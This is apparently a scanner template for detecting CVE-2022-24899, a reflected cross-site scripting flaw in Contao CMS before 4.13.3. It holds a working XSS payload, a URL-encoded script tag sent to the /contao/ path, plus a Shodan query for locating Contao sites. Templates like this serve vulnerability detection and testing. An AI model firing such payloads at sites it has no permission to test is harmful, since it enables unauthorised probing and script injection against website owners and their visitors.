2022-06-18 18:50:43 +00:00
id: CVE-2022-24899

info:
  name: Contao 4.13.2 - Cross-Site Scripting (XSS)
  author: ritikchaddha
  severity: medium
  description: |
    Contao is a powerful open source CMS that allows you to create professional websites and scalable web applications. In versions of Contao prior to 4.13.3 it is possible to inject code into the canonical tag. As a workaround users may disable canonical tags in the root page settings.
  reference:
    - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
    - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24899
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-24899
    cwe-id: CWE-79
  metadata:
    shodan-query: title:"Contao"
  tags: cve,cve2022,contao,xss,huntr

requests:
  - method: GET
    path:
      - "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script>'
          - '"Not authenticated"'
        condition: and

      - type: word
        part: header
        words:
          - text/html